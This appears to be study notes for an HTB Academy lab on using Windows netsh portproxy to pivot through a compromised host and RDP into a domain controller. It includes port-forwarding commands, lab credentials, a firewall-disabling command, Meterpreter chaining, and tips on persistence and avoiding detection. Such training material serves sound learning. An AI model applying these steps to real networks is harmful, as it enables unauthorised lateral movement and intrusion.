Purpose: Native Windows port forwarding using built-in tools
Tool: netsh.exe - Windows network configuration utility
Technique: IPv4-to-IPv4 port proxy forwarding
Advantage: No external tools required (living off the land)
Scenario: Windows workstation as pivot to internal network
- Full Name: Network Shell (netsh.exe)
- Type: Built-in Windows command-line utility
- Purpose: Network configuration and management
- Location:
C:\Windows\System32\netsh.exe - Availability: Present on all Windows systems
- Privileges: Requires administrator privileges for port forwarding
- Finding routes - network path discovery
- Viewing firewall configuration - Windows Firewall management
- Adding proxies - proxy server configuration
- Creating port forwarding rules - IPv4-to-IPv4 forwarding
- Network interface management - adapter configuration
| Tool | Type | Availability | Configuration | Stealth |
|---|---|---|---|---|
| Netsh | Built-in | Always present | Command-line | High (legitimate tool) |
| Plink | External | PuTTY required | SSH-based | Medium (admin tool) |
| PowerShell | Built-in | Windows 7+ | Script-based | High (native) |
| SSH | External | Windows 10+ | SSH tunneling | Medium (newer feature) |
[Attack Host] → [Windows 10 Pivot] → [Windows Server]
10.10.15.5 10.129.15.150 172.16.5.25:3389
xfreerdp netsh portproxy RDP service
:8080 :8080 → :3389 Domain Controller
# Basic netsh port forwarding syntax
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
# Command breakdown:
# interface portproxy - portproxy interface
# add v4tov4 - add IPv4-to-IPv4 forwarding rule
# listenport=8080 - port to listen on (pivot host)
# listenaddress= - IP to bind listener (pivot host)
# connectport=3389 - destination port (target)
# connectaddress= - destination IP (target)# Show all IPv4-to-IPv4 port forwards
netsh.exe interface portproxy show v4tov4
# Expected output:
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
10.129.15.150 8080 172.16.5.25 3389- Listen Address: 10.129.15.150 (Windows 10 pivot host)
- Listen Port: 8080 (accessible from attack host)
- Connect Address: 172.16.5.25 (internal Windows server)
- Connect Port: 3389 (RDP service)
# RDP to Windows 10 pivot (from HTB Academy lab)
xfreerdp /v:<windows_pivot_ip> /u:htb-student /p:HTB_@cademy_stdnt!
# Verify current network configuration
ipconfig
netstat -an | findstr :3389# Open Command Prompt as Administrator
# Run netsh port forwarding command
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19
# Note: Adjust IP addresses based on lab environment# Check if rule was created successfully
netsh.exe interface portproxy show v4tov4
# Verify port is listening
netstat -an | findstr :8080
# Expected output:
TCP 10.129.15.150:8080 0.0.0.0:0 LISTENING# From attack host (Pwnbox), connect through port forward
xfreerdp /v:10.129.15.150:8080 /u:victor /p:pass@123 /cert:ignore
# Traffic flow: Attack Host → Pivot:8080 → DC:3389# Forward multiple services simultaneously
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19
netsh.exe interface portproxy add v4tov4 listenport=8445 listenaddress=10.129.15.150 connectport=445 connectaddress=172.16.5.19
netsh.exe interface portproxy add v4tov4 listenport=8135 listenaddress=10.129.15.150 connectport=135 connectaddress=172.16.5.19
# Verify all forwards
netsh.exe interface portproxy show v4tov4# Bind to all interfaces (0.0.0.0)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.19
# Bind to specific interface only
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=192.168.1.100 connectport=3389 connectaddress=172.16.5.19# IPv6-to-IPv6 forwarding
netsh.exe interface portproxy add v6tov6 listenport=8080 listenaddress=::1 connectport=3389 connectaddress=fe80::1
# IPv4-to-IPv6 forwarding
netsh.exe interface portproxy add v4tov6 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=fe80::1
# IPv6-to-IPv4 forwarding
netsh.exe interface portproxy add v6tov4 listenport=8080 listenaddress=::1 connectport=3389 connectaddress=172.16.5.19"Using the concepts covered in this section, take control of the DC (172.16.5.19) using xfreerdp by pivoting through the Windows 10 target host. Submit the approved contact's name found inside the 'VendorContacts.txt' file located in the 'Approved Vendors' folder on Victor's desktop (victor's credentials: victor:pass@123)."
# RDP to Windows 10 pivot host
xfreerdp /v:<windows10_ip> /u:htb-student /p:HTB_@cademy_stdnt! /cert:ignore
# Example IP from lab environment
xfreerdp /v:10.129.42.198 /u:htb-student /p:HTB_@cademy_stdnt! /cert:ignore# In Windows 10 Command Prompt (Run as Administrator)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.19
# Verify configuration
netsh.exe interface portproxy show v4tov4
# Expected output:
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
10.129.42.198 8080 172.16.5.19 3389# Verify port is listening
netstat -an | findstr :8080
# Expected output:
TCP 10.129.42.198:8080 0.0.0.0:0 LISTENING# From attack host (Pwnbox)
xfreerdp /v:10.129.42.198:8080 /u:victor /p:pass@123 /cert:ignore
# This connects: Attack Host → Windows10:8080 → DC:3389# Once logged in as victor on DC (172.16.5.19):
1. Open File Explorer
2. Navigate to Desktop
3. Open "Approved Vendors" folder
4. Open "VendorContacts.txt" file
5. Find the approved contact name
# Format: 1 space, not case-sensitive
Answer: [Approved contact name from VendorContacts.txt]
Expected File Path: C:\Users\victor\Desktop\Approved Vendors\VendorContacts.txt
# Problem: Insufficient privileges
Access is denied.
# Solutions:
1. Run Command Prompt as Administrator
Right-click CMD → "Run as administrator"
2. Verify user privileges
whoami /priv
3. Check if user is in Administrators group
net user %username%# Problem: Listen port already bound
The process cannot access the file because it is being used by another process.
# Solutions:
1. Check what's using the port
netstat -ano | findstr :8080
2. Kill process using port
taskkill /PID <process_id> /F
3. Use different port
netsh.exe interface portproxy add v4tov4 listenport=8081 ...# Problem: Cannot connect to forwarded port
Connection refused
# Solutions:
1. Verify port forward exists
netsh.exe interface portproxy show v4tov4
2. Check Windows Firewall
netsh advfirewall firewall show rule name=all
3. Test local connectivity
telnet 172.16.5.19 3389# Problem: Windows Firewall blocking connections
# Solutions:
1. Add firewall exception for port
netsh advfirewall firewall add rule name="Port 8080" dir=in action=allow protocol=TCP localport=8080
2. Temporarily disable firewall (testing only)
netsh advfirewall set allprofiles state off
3. Check existing rules
netsh advfirewall firewall show rule name=all | findstr 8080# Show all IPv4-to-IPv4 forwards
netsh.exe interface portproxy show v4tov4
# Show all IPv6-to-IPv6 forwards
netsh.exe interface portproxy show v6tov6
# Show all port proxy configurations
netsh.exe interface portproxy show all# Delete specific IPv4-to-IPv4 forward
netsh.exe interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.15.150
# Delete all IPv4-to-IPv4 forwards
netsh.exe interface portproxy reset
# Delete specific IPv6 forwards
netsh.exe interface portproxy delete v6tov6 listenport=8080 listenaddress=::1# Port forwards created with netsh are persistent across reboots
# They survive system restarts automatically
# To make temporary (session-only) forwards, consider alternatives:
# - SSH local forwarding
# - PowerShell port forwarding scripts
# - Third-party tools- Legitimate Tool - netsh.exe is standard Windows utility
- Administrative Logs - commands logged in Windows Event Log
- Persistent Rules - forwards survive reboots (good for persistence)
- Firewall Integration - works with Windows Firewall
- Process Visibility - no additional processes required
- Command Line Auditing - PowerShell/CMD logging may capture commands
- Event Log Entries - Windows Security log may record configuration changes
- Network Monitoring - unusual port listeners detectable
- Registry Changes - port proxy rules stored in registry
- Forensic Artifacts - commands may be recoverable from memory/disk
# Port proxy rules stored in registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
# View registry entries
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp# Combine netsh port forwarding with SSH tunnels
# 1. Create netsh forward on Windows pivot
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=22 connectaddress=172.16.5.100
# 2. SSH through the forward from attack host
ssh -L 9999:172.16.5.19:3389 user@10.129.15.150 -p 8080# Use Meterpreter to execute netsh commands
meterpreter > shell
C:\> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19
# Or use Meterpreter's portfwd along with netsh
meterpreter > portfwd add -l 8081 -p 3389 -r 172.16.5.19# PowerShell wrapper for netsh commands
function New-PortForward {
param(
[int]$ListenPort,
[string]$ListenAddress,
[int]$ConnectPort,
[string]$ConnectAddress
)
$cmd = "netsh.exe interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress"
Invoke-Expression $cmd
}
# Usage
New-PortForward -ListenPort 8080 -ListenAddress "10.129.15.150" -ConnectPort 3389 -ConnectAddress "172.16.5.19"# Chain multiple netsh forwards
# Windows Pivot 1 (DMZ)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=192.168.1.100 connectport=8080 connectaddress=10.0.0.50
# Windows Pivot 2 (Internal)
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.0.0.50 connectport=3389 connectaddress=10.0.1.10# RDP forwarding
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.19
# SMB forwarding
netsh.exe interface portproxy add v4tov4 listenport=8445 listenaddress=0.0.0.0 connectport=445 connectaddress=172.16.5.19
# WinRM forwarding
netsh.exe interface portproxy add v4tov4 listenport=8985 listenaddress=0.0.0.0 connectport=5985 connectaddress=172.16.5.19
# HTTPS forwarding
netsh.exe interface portproxy add v4tov4 listenport=8443 listenaddress=0.0.0.0 connectport=443 connectaddress=172.16.5.19# Forward to multiple backends (manual round-robin)
netsh.exe interface portproxy add v4tov4 listenport=8081 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.10
netsh.exe interface portproxy add v4tov4 listenport=8082 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.11
netsh.exe interface portproxy add v4tov4 listenport=8083 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.12| Tool | Complexity | Persistence | Admin Required | Stealth |
|---|---|---|---|---|
| Netsh | Low | High (persistent) | Yes | High |
| PowerShell | Medium | Low (script-based) | Depends | Medium |
| Windows Firewall | High | High | Yes | High |
| IIS URL Rewrite | High | High | Yes | Medium |
✅ Windows environment with admin access
✅ Persistent forwarding needed across reboots
✅ Simple port forwarding requirements
✅ Living off the land approach preferred
✅ No external tools can be installed
❌ No admin privileges available
❌ Complex routing requirements
❌ Cross-platform compatibility needed
❌ Temporary forwarding only (creates persistent rules)
❌ Stealth operation (logged extensively)
- Test locally first - verify connectivity before deployment
- Use non-standard ports - avoid common port detection
- Document configurations - track created port forwards
- Clean up after use - remove forwards when done
- Monitor connections - watch for unexpected traffic
- Minimize exposure time - create forwards only when needed
- Use specific bind addresses - avoid 0.0.0.0 when possible
- Implement access controls - Windows Firewall rules
- Monitor event logs - watch for detection indicators
- Rotate ports regularly - vary port usage patterns
- Limit concurrent forwards - avoid resource exhaustion
- Monitor bandwidth usage - track network utilization
- Consider connection limits - Windows has TCP connection limits
- Optimize for target services - tune for specific protocols
- Test under load - verify performance with multiple connections
- HTB Academy: Pivoting, Tunneling & Port Forwarding - Page 11
- Microsoft Netsh Documentation: Official Netsh Reference
- Netsh Portproxy: Port Proxy Commands
- Windows Network Security: Security Considerations
- SANS Windows Pivoting: Windows Lateral Movement Techniques